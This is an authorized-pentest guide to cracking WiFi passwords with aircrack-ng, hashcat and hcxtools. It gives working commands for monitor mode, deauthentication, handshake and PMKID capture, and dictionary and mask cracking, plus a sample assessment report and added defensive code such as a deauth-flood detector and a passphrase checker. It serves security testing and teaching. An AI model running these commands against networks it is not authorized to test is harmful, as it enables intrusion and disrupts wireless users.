Performing WiFi Password Cracking with Aircrack-ng

When to Use

  • Assessing the strength of WPA/WPA2/WPA3 passphrases during authorized wireless penetration tests
  • Testing whether wireless networks are using weak or default passwords that can be cracked offline
  • Capturing and analyzing 4-way handshakes to evaluate wireless authentication security
  • Demonstrating the risks of WEP, weak WPA2 passphrases, and PMKID-based attacks to stakeholders
  • Validating that enterprise wireless networks use 802.1X/EAP instead of pre-shared keys
Do not use against wireless networks without explicit written authorization, for disrupting wireless communications, or for capturing handshakes of networks you do not have permission to test.

Prerequisites

  • Written authorization specifying in-scope SSIDs and wireless networks
  • Wireless adapter with monitor mode and packet injection support (Alfa AWUS036ACH, Alfa AWUS036ACM, or similar)
  • Kali Linux with aircrack-ng suite, hashcat, and hcxtools installed
  • Password wordlists (rockyou.txt, SecLists, or custom organization-specific lists)
  • GPU-capable system for hashcat acceleration (optional but recommended for large wordlists)

Workflow

Step 1: Prepare the Wireless Interface

```bash
# Identify wireless interfaces
iwconfig
# or
iw dev

# Kill interfering processes
sudo airmon-ng check kill

# Enable monitor mode
sudo airmon-ng start wlan0
# Output: monitor mode enabled on wlan0mon

# Verify monitor mode
iwconfig wlan0mon
# Mode should show "Monitor"

# Alternatively, enable monitor mode manually
sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
sudo ip link set wlan0 up
```

Step 2: Scan for Target Networks

```bash
# Scan all channels for access points
sudo airodump-ng wlan0mon

# Output columns:
# BSSID              PWR  Beacons  #Data  CH  ENC   CIPHER  AUTH  ESSID
# AA:BB:CC:DD:EE:FF  -45  120      35     6   WPA2  CCMP    PSK   TargetNetwork

# Identify the target network parameters:
# - BSSID (MAC address of the access point)
# - Channel number
# - Encryption type (WPA2-PSK is the target)
# - Connected clients (in the lower section)

# Focus scanning on the target channel
sudo airodump-ng wlan0mon --channel 6 --bssid AA:BB:CC:DD:EE:FF -w capture
```
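Added example, not part of the original page: a small parser for the airodump-ng access-point rows in the column layout above, producing the SSID/BSSID/Encryption/Auth/Channel/Crackable inventory used later in the report. The scan text is constructed (invented BSSIDs and ESSIDs); airodump-ng labels 802.1X/EAP networks `MGT` and WPA3 networks `SAE`.

```python
"""Inventory airodump-ng access-point rows and flag networks open to offline PSK cracking."""
import re

# Constructed sample in the airodump-ng column layout shown above; addresses and
# ESSIDs are invented. AUTH is MGT for 802.1X/EAP, PSK for pre-shared key, SAE for WPA3.
SAMPLE_SCAN = """\
BSSID              PWR  Beacons  #Data  CH  ENC   CIPHER  AUTH  ESSID
AA:BB:CC:11:22:33  -40  210      12     36  WPA2  CCMP    MGT   Corp-WiFi
AA:BB:CC:44:55:66  -52  180      35     6   WPA2  CCMP    PSK   Guest-WiFi
AA:BB:CC:77:88:99  -61  95       3      1   WPA2  CCMP    PSK   IoT-WiFi
AA:BB:CC:AA:BB:CC  -70  40       0      11  WPA3  CCMP    SAE   Lab WiFi 5G
"""

# One AP row: MAC, signed power, three integers, then ENC/CIPHER/AUTH tokens and the
# ESSID (which may contain spaces). Real WEP rows can have a blank AUTH and will not match.
ROW_RE = re.compile(
    r"^\s*(?P<bssid>(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2})\s+(?P<pwr>-?\d+)\s+"
    r"(?P<beacons>\d+)\s+(?P<data>\d+)\s+(?P<ch>\d+)\s+(?P<enc>\S+)\s+"
    r"(?P<cipher>\S+)\s+(?P<auth>\S+)\s+(?P<essid>.*?)\s*$"
)

def parse_scan(text):
    """Return one dict per access-point row; the header and non-matching lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            d = m.groupdict()
            d["ch"] = int(d["ch"])
            rows.append(d)
    return rows

def assess(ap):
    """Classify an AP the way the report's 'Crackable' column does."""
    enc, auth = ap["enc"], ap["auth"]
    if enc == "WEP":
        return "YES (WEP, broken cipher)"
    if auth == "PSK" and enc.startswith("WPA"):
        return "YES (offline dictionary attack on captured handshake/PMKID)"
    if auth == "SAE":
        return "NO (WPA3-SAE resists offline attacks)"
    if auth == "MGT":
        return "N/A (Enterprise 802.1X/EAP)"
    if enc == "OPN":
        return "N/A (open network, no encryption)"
    return "UNKNOWN"

def inventory(text):
    """Return (essid, bssid, enc, auth, channel, crackable) tuples for the report table."""
    return [(a["essid"], a["bssid"], a["enc"], a["auth"], a["ch"], assess(a))
            for a in parse_scan(text)]
```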

Step 3: Capture the WPA2 4-Way Handshake

```bash
# Method 1: Wait for a client to connect naturally
# Keep airodump-ng running and wait for the "WPA handshake: AA:BB:CC:DD:EE:FF" message
sudo airodump-ng wlan0mon --channel 6 --bssid AA:BB:CC:DD:EE:FF -w handshake_capture

# Method 2: Deauthenticate a client to force reconnection (active)
# In a separate terminal, send deauth packets to a specific client
sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon
# Or deauth all clients (broadcast)
sudo aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF wlan0mon

# Method 3: Capture PMKID from the AP (no client needed)
# Using hcxdumptool
sudo hcxdumptool -i wlan0mon --enable_status=1 -o pmkid_capture.pcapng \
    --filterlist_ap=AA:BB:CC:DD:EE:FF --filtermode=2
# Wait for the "PMKID" message, then convert for hashcat
hcxpcapngtool -o pmkid_hash.hc22000 pmkid_capture.pcapng

# Verify the handshake was captured
aircrack-ng handshake_capture-01.cap
# Should show "1 handshake" next to the target BSSID

# Alternative verification with cowpatty
cowpatty -r handshake_capture-01.cap -c
```
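Added example, not part of the original page: the defender's view of Method 2. A wireless IDS sees a deauthentication attack as a burst of deauth/disassoc management frames from one source, so this detector counts them per source in a sliding window; the frame records are constructed (timestamp, subtype, source, destination), and 802.11w Protected Management Frames is the control that actually stops the attack.

```python
"""Detect deauthentication floods in 802.11 management-frame records."""
from collections import deque

DEAUTH, DISASSOC = 0x0C, 0x0A      # 802.11 management frame subtypes
BROADCAST = "ff:ff:ff:ff:ff:ff"

# Constructed sample: (timestamp_s, subtype, source, destination). Two isolated
# frames that look like normal roaming, then a burst of 64 broadcast deauths spoofed
# from the AP address used in the aireplay-ng examples above.
SAMPLE_FRAMES = [
    (0.0, DEAUTH, "aa:bb:cc:dd:ee:ff", "11:22:33:44:55:66"),
    (30.0, DISASSOC, "aa:bb:cc:dd:ee:ff", "11:22:33:44:55:66"),
    *[(60.0 + i * 0.01, DEAUTH, "aa:bb:cc:dd:ee:ff", BROADCAST) for i in range(64)],
]

def detect_deauth_flood(frames, window_s=10.0, threshold=20):
    """Return one alert per source whose deauth/disassoc frames reach `threshold`
    inside any `window_s` window: (source, window_start, peak_count, broadcast_seen).
    Broadcast deauths are a strong indicator, since legitimate APs rarely send them."""
    per_src = {}     # source MAC -> deque of (timestamp, is_broadcast) inside the window
    alerts = {}
    for ts, subtype, src, dst in sorted(frames, key=lambda f: f[0]):
        if subtype not in (DEAUTH, DISASSOC):
            continue
        q = per_src.setdefault(src, deque())
        q.append((ts, dst == BROADCAST))
        while ts - q[0][0] > window_s:           # drop frames that fell out of the window
            q.popleft()
        if len(q) >= threshold:
            prev = alerts.get(src)
            start = prev[1] if prev else q[0][0]
            count = max(len(q), prev[2]) if prev else len(q)
            bcast = any(b for _, b in q) or (prev[3] if prev else False)
            alerts[src] = (src, start, count, bcast)
    return list(alerts.values())
```

The two isolated frames never trigger an alert, while the burst is reported once with its peak count, so the threshold and window can be tuned against a baseline capture before alerting on it.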

Step 4: Crack with Aircrack-ng (CPU-based)

```bash
# Crack using the rockyou wordlist
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b AA:BB:CC:DD:EE:FF handshake_capture-01.cap

# Use multiple wordlists
aircrack-ng -w /usr/share/wordlists/rockyou.txt,/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt \
    -b AA:BB:CC:DD:EE:FF handshake_capture-01.cap

# Crack with a specific ESSID
aircrack-ng -w /usr/share/wordlists/rockyou.txt -e "TargetNetwork" handshake_capture-01.cap

# If successful, the output shows:
# KEY FOUND! [ password123 ]
```

Step 5: Crack with Hashcat (GPU-accelerated)

```bash
# Convert capture to hashcat format
# For handshake captures:
hcxpcapngtool -o hashcat_input.hc22000 handshake_capture-01.cap

# Or use aircrack-ng conversion. Note that -j writes hashcat_input.hccapx, the older
# format read by hashcat's legacy mode 2500; the .hc22000 file above is what -m 22000 expects
aircrack-ng handshake_capture-01.cap -j hashcat_input

# Dictionary attack with hashcat
hashcat -m 22000 hashcat_input.hc22000 /usr/share/wordlists/rockyou.txt

# Rule-based attack (transforms dictionary words)
hashcat -m 22000 hashcat_input.hc22000 /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

# Brute force 8-character numeric passwords
hashcat -m 22000 hashcat_input.hc22000 -a 3 ?d?d?d?d?d?d?d?d

# Combination attack (two wordlists combined)
hashcat -m 22000 hashcat_input.hc22000 -a 1 wordlist1.txt wordlist2.txt

# Mask attack for common patterns (Word + 4 digits)
hashcat -m 22000 hashcat_input.hc22000 -a 3 -1 ?l?u ?1?1?1?1?1?d?d?d?d

# For PMKID-specific hashes
hashcat -m 22000 pmkid_hash.hc22000 /usr/share/wordlists/rockyou.txt

# Show cracked password
hashcat -m 22000 hashcat_input.hc22000 --show
```
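Added example, not part of the original page: a policy check a defender can run on a proposed pre-shared key before it is deployed. It applies the recommendation given in Step 6 (15+ characters, mixed case, digits, symbols), rejects the two mask patterns hashcat is pointed at above, and sizes the mask keyspace a passphrase falls under; the wordlist is a small constructed stand-in for rockyou.txt.

```python
"""Check a proposed WPA/WPA2-PSK passphrase against the assessment's recommendation."""
import math
import re
import string

# Constructed stand-in for a wordlist such as rockyou.txt (the real file has millions of entries)
SAMPLE_WORDLIST = {"password123", "welcome2024!", "iot12345", "letmein", "qwerty123"}

# Sizes of hashcat's built-in charsets, used to size the mask a passphrase falls under
CHARSET_SIZE = {"?l": 26, "?u": 26, "?d": 10, "?s": 33}

def mask_of(passphrase):
    """Hashcat mask covering this passphrase, e.g. 'iot12345' -> '?l?l?l?d?d?d?d?d'.
    Anything outside ASCII letters and digits is approximated as ?s."""
    out = []
    for ch in passphrase:
        if ch in string.ascii_lowercase:
            out.append("?l")
        elif ch in string.ascii_uppercase:
            out.append("?u")
        elif ch in string.digits:
            out.append("?d")
        else:
            out.append("?s")
    return "".join(out)

def mask_keyspace(mask):
    """Candidates a mask attack must try: the product of the per-position charset sizes."""
    return math.prod(CHARSET_SIZE[mask[i:i + 2]] for i in range(0, len(mask), 2))

def check_passphrase(passphrase, wordlist=SAMPLE_WORDLIST):
    """Return policy failures (an empty list means the passphrase passes): 15+ chars,
    mixed case, digits, symbols, not in a wordlist, not one of the Step 5 mask patterns."""
    failures = []
    if len(passphrase) < 15:
        failures.append("shorter than 15 characters")
    if not (any(c.islower() for c in passphrase) and any(c.isupper() for c in passphrase)):
        failures.append("no mixed case")
    if not any(c.isdigit() for c in passphrase):
        failures.append("no digits")
    if not any(c in string.punctuation for c in passphrase):
        failures.append("no symbols")
    if passphrase.lower() in wordlist:
        failures.append("present in wordlist")
    if re.fullmatch(r"\d{8}", passphrase):
        failures.append("8-digit numeric, mask ?d?d?d?d?d?d?d?d")
    elif re.fullmatch(r"[A-Za-z]{5}\d{4}", passphrase):
        failures.append("word + 4 digits, mask -1 ?l?u ?1?1?1?1?1?d?d?d?d")
    return failures
```

For the report's IoT-WiFi password the mask keyspace is only 26^3 * 10^5 candidates, which is why a patterned eight-character key falls in seconds while a 20-character random passphrase does not.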

Step 6: Document and Clean Up

```bash
# Stop monitor mode
sudo airmon-ng stop wlan0mon

# Restart networking services
sudo systemctl restart NetworkManager

# Generate report
cat > wifi_assessment_report.txt << 'EOF'
WiFi Security Assessment Results

Target SSID: TargetNetwork
BSSID: AA:BB:CC:DD:EE:FF
Encryption: WPA2-PSK (CCMP)
Channel: 6
Handshake Capture: Successful (Method: Client deauthentication)
Cracking Result: PASSWORD FOUND
Password: [documented securely]
Time to Crack: 3 minutes 47 seconds (rockyou.txt, hashcat GPU)

Recommendation: Change to a passphrase of 15+ characters with mixed case, numbers, and symbols, or migrate to WPA2/WPA3-Enterprise with 802.1X.
EOF

# Securely handle capture files (they contain sensitive authentication material)
sha256sum handshake_capture-01.cap > evidence_hashes.txt
# Transfer to secure evidence storage per engagement agreement
```

Key Concepts

| Term | Definition |
|---|---|
| 4-Way Handshake | WPA/WPA2 authentication exchange between client and AP that derives session keys from the PSK, captured for offline password cracking |
| PMKID | Pairwise Master Key Identifier included in the first EAPOL frame from the AP, allowing password cracking without capturing the full handshake or requiring a connected client |
| Monitor Mode | Wireless interface mode that captures all wireless frames on a channel without associating with any access point |
| Deauthentication Attack | Sending forged 802.11 management frames to disconnect a client from the AP, forcing a reconnection that generates a capturable handshake |
| PSK (Pre-Shared Key) | Static password used by all users to authenticate to a WPA/WPA2-Personal network, vulnerable to offline dictionary attacks |
| 802.1X/EAP | Enterprise wireless authentication using RADIUS that provides per-user credentials, eliminating the shared password vulnerability |

Tools & Systems

  • aircrack-ng suite: Comprehensive wireless security toolkit including airodump-ng (capture), aireplay-ng (injection), and aircrack-ng (cracking)
  • hashcat: GPU-accelerated password cracker supporting WPA/WPA2 handshakes (mode 22000) with dictionary, rule, and mask attacks
  • hcxtools: Tools for capturing PMKID and converting wireless captures to hashcat-compatible formats
  • hcxdumptool: Capture tool specifically designed for PMKID extraction without requiring client deauthentication
  • cowpatty: WPA/WPA2 cracking tool with precomputed hash table support for faster dictionary attacks

Common Scenarios

Scenario: Wireless Penetration Test for a Corporate Office

Context: A financial services company wants to assess the security of their wireless networks. They have three SSIDs: Corp-WiFi (WPA2-Enterprise for employees), Guest-WiFi (WPA2-PSK for visitors), and IoT-WiFi (WPA2-PSK for IoT devices). The assessment is authorized to test all three networks.
Approach:
  1. Scan for all three SSIDs and identify their BSSIDs, channels, and encryption types
  2. Verify that Corp-WiFi uses 802.1X/EAP by examining beacon frames -- confirmed, no PSK to crack
  3. Capture the 4-way handshake for Guest-WiFi by deauthenticating a connected device and capturing the reconnection
  4. Run hashcat with rockyou.txt against the Guest-WiFi handshake -- password "Welcome2024!" cracked in 47 seconds
  5. Capture PMKID from IoT-WiFi access point (no client deauth needed) and crack with hashcat -- password "iot12345" found in 12 seconds
  6. Demonstrate that Guest-WiFi and IoT-WiFi passwords are weak and easily crackable
  7. Recommend migrating Guest-WiFi to a captive portal with per-session passwords and strengthening IoT-WiFi to a 20+ character passphrase
Pitfalls:
  • Sending excessive deauth frames that disrupt legitimate wireless users beyond the test scope
  • Not using a wireless adapter that supports the target network's frequency band (2.4 GHz vs 5 GHz)
  • Attempting to crack WPA3-SAE networks with traditional handshake capture (SAE is resistant to offline attacks)
  • Running GPU cracking on shared systems without monitoring temperature and power consumption

Output Format


Wireless Security Assessment Report

Assessment Date: 2024-03-15
Location: Corporate Office, Building A

Network Inventory

| SSID | BSSID | Encryption | Auth | Channel | Crackable |
|---|---|---|---|---|---|
| Corp-WiFi | AA:BB:CC:11:22:33 | WPA2 | 802.1X | 36 | N/A (Enterprise) |
| Guest-WiFi | AA:BB:CC:44:55:66 | WPA2 | PSK | 6 | YES - 47 seconds |
| IoT-WiFi | AA:BB:CC:77:88:99 | WPA2 | PSK | 1 | YES - 12 seconds |

Findings

Finding 1: Weak Guest-WiFi Password (High)
  • Password: "Welcome2024!" (cracked via dictionary in 47 seconds)
  • Present in rockyou.txt top 100,000 entries
  • Shared among all visitors with no rotation policy
Finding 2: Trivial IoT-WiFi Password (Critical)
  • Password: "iot12345" (cracked in 12 seconds)
  • Default-pattern password providing access to IoT device network
  • No network segmentation between IoT-WiFi and corporate resources

Recommendations

  1. Migrate Guest-WiFi to captive portal with per-session credentials
  2. Change IoT-WiFi to 20+ character random passphrase with quarterly rotation
  3. Implement network segmentation isolating IoT VLAN from corporate resources
  4. Consider WPA3-SAE for PSK networks to prevent offline cracking
  5. Enable 802.11w Protected Management Frames to prevent deauth attacks